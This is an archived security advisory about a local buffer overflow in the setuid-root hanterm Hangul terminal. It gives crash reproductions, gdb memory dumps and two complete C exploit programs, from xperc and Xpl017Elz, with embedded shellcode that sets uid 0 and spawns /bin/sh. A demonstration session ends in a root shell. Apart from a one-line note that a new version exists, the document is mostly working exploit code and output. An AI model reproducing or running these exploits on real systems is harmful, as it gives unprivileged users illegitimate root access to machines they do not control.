|
COMMAND hanterm local buffer overflow exploit SYSTEMS AFFECTED hanterm-xf-p18-3.3-6 PROBLEM Xperc posted : hanterm is Hangul terminal for X. it is based on the xterm in XFree86. The hanterm binary is default installed with setuid root permissions for TurboLinux Server 6.5. but contains insecure code with allows unprivileged local users to obtain root access on the local system. $which hanterm /usr/bin/X11/hanterm $ls -l /usr/bin/X11/hanterm -rws--x--x 1 root root 166100 03 13 2001 /usr/bin/X11/hanterm* $rpm -qf /usr/bin/X11/hanterm hanterm-xf-p18-3.3-6 $hanterm -fn `perl -e \'print \"a\"x100\'` Segmentation fault $hanterm -hfb `perl -e \'print \"a\"x8000\'` Segmentation fault $hanterm -hfn `perl -e \'print \"a\"x8000\'` Segmentation fault ...etc /* hanterm_exp.c * * local exploit for hanterm * .. tested in TurboLinux Server 6.5 (Japan) * * thanks my Japanese friend kaju(kaijyu) * and Japanese hacker UNYUN. * * by xperc@hotmail.com * 2002/02/07 */ #include <stdio.h> #define NOP 0x90 #define MAXBUF 88 #define RETOFS 84 #define SHELL_OFS 22 #define ESP_OFS -0xe38 unsigned int get_esp() { __asm__(\"mov %esp,%eax\"); } int main() { static char shellcode[]={ 0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80, 0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80, 0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0, 0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b, 0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c, 0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f, 0x62,0x69,0x6e,0x2f,0x73,0x68,0x00 }; unsigned int retadr; char buf[MAXBUF]; int i; memset(buf,NOP,MAXBUF); retadr=get_esp()+ESP_OFS; printf(\"Jumping address = %p\\n\",retadr); for(i=RETOFS-32;i<RETOFS+32;i+=4){ buf[i] =retadr&0xff; buf[i+1]=(retadr>>8)&0xff; buf[i+2]=(retadr>>16)&0xff; buf[i+3]=(retadr>>24)&0xff; } strncpy(buf+SHELL_OFS,shellcode,strlen(shellcode)); //buf[MAXBUF-1]=\'\\0\'; faint!:-( execl(\"/usr/bin/X11/hanterm\",\"hanterm\",\"-fn\",buf,(char *)0); } Update (11 Feburary 2002) ====== Stuart Moore reported the following exploit for FreeBSD credits goes to \"you dong-hun\" and Xpl017Elz : /* ** ** How to exploit? ** ** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm . ** [x82@xpl017elz x82]$ gdb -q hanterm ** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn`perl -e ** \'print \"x\"x80\'` ** ** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn`perl -e ** \'print \"x\"x80\'` ** (no debugging symbols found)...(no debugging symbols found)... ** (no debugging symbols found)...(no debugging symbols found)... ** (no debugging symbols found)...(no debugging symbols found)... ** (no debugging symbols found)... ** Program received signal SIGSEGV, Segmentation fault. ** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30 ** 30 ../sysdeps/generic/strcpy.c: ±×·± ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½. ** (gdb) info reg $esp ** esp 0xbfffe6b8 -1073748296 ** (gdb) x/80 0xbffffb00 ** 0xbffffb00: 0x65746e61 0x2d006d72 0x70736964 0x0079616c ** 0xbffffb10: 0x332e3136 0x37312e37 0x37322e37 0x2d00303a ** 0xbffffb20: 0x78006e66 0x78787878 0x78787878 0x78787878 ** 0xbffffb30: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffffb40: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffffb50: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffffb60: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffffb70: 0x00787878 0x5353454c 0x4e45504f 0x656c7c3d ** ... ... ... ... ... ** 0xbffffc10: 0x2d2a2d36 0x3563736b 0x2e313036 0x37383931 ** 0xbffffc20: 0x2d2c302d 0x6f6b2d2a 0x2d676964 0x6964656d ** 0xbffffc30: 0x722d6d75 0x726f6e2d 0x2d6c616d 0x2d38312d ** (gdb) ** ** Buffer Structure ** ** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte ** ** The return until the address the whole it contains and, ** it puts in an option. ** ** [x82@xpl017elz x82]$ ./exploit ** ** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit ** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte ** ** Exploit made by Xpl017Elz ** ** Display HOST_IP: 255.255.255.255:0 ** Jumping Address: 0xbffffb74 ** ** Segmentation fault ** [x82@xpl017elz x82]$ ** ** It calculates the offset. ** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between, ** it will be suitable. ** ** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88 ** ** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit ** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte ** ** Exploit made by Xpl017Elz ** ** Display HOST_IP: 61.xx.177.27:0 ** Jumping Address: 0xbffffb26 ** ** bash# ** ** Ooops! it\'s rootshell :-) ** */ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 #define DFOFS 2400 #define DFIP \"255.255.255.255:0\" #define DFBUF 88 /* ** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte */ char shellcode[] = /* 53byte shellcode */ \"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\" /* setreuid(0,0); */ \"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\" \"\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\" \"\\x08\\x31\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\" \"\\x80\\xe8\\xde\\xff\\xff\\xff/bin/sh\"; unsigned long sp(void) { __asm__(\"movl %esp,%eax\"); } main(int argc, char *argv[]) { int rufp, fpru, jobst, ferbuf, num=DFBUF, ofs=DFOFS; long addr; char buffer[2000], hoip[] = DFIP; extern char *optarg; banrl(); while ((jobst = getopt(argc, argv, \"a:o:b:\")) !=EOF) switch (jobst) { case \'a\': strcpy(hoip, optarg); break; case \'o\': ofs = atoi(optarg); break; case \'b\': num = atoi(optarg); break; case \'?\': usages(argv[0]); exit(0); } printf(\" Display HOST_IP: %s\\n\",hoip); addr = sp() +ofs; // -ofs; printf(\" Jumping Address: %p\\n\\n\",addr); ferbuf = num - sizeof(shellcode) -4; bzero(&buffer,2000); for(rufp=0; rufp<=ferbuf; rufp++) { buffer[rufp] = NOP; } for(fpru=0; fpru<=52; fpru++) { buffer[rufp++] = shellcode[fpru]; } buffer[rufp++] = addr & 0xff; buffer[rufp++] = addr>> 8 & 0xff; buffer[rufp++] = addr>>16 & 0xff; buffer[rufp++] = addr>>24 & 0xff; execl(\"/usr/X11R6/bin/hanterm\", \"hanterm\", \"-display\", hoip, \"-fn\", buffer, NULL); exit(0); } usages(char *var) { printf(\"\\n Usage:\\n %s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return addr)\\n\",var); printf(\" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\\n\\n\",var); } banrl() { printf(\"\\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\\n\"); printf(\" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte\\n\\n\"); printf(\"\\t\\t\\t Exploit made by Xpl017Elz\\n\\n\"); } SOLUTION New version has been released.